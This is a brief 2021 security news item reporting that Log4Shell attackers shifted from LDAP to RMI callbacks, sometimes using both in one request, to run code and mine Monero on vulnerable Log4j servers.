Security News > 2021 > December > Log4j attackers switch to RMI to inject code and mine Monero
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.
From LDAP to RMI. Most attacks targeting the Log4j "Log4Shell" vulnerability have been through the LDAP service.
The switch to RMI API seems counter-intuitive at first, considering that this mechanism is subject to additional checks and constraints, but that's not always the case.
Some JVM versions do not feature stringent policies, and as such, RMI can sometimes be a more effortless channel to achieving RCE than LDAP. Moreover, LDAP requests are now solidified as part of the infection chain and are more tightly monitored by defenders.
In some cases, Juniper saw both RMI and LDAP services in the same HTTP POST request.
For all actors attempting to abuse the Log4Shell vulnerability, the goal remains the same - sending an exploit string to be processed by the vulnerable Log4j server, leading to code execution on the target.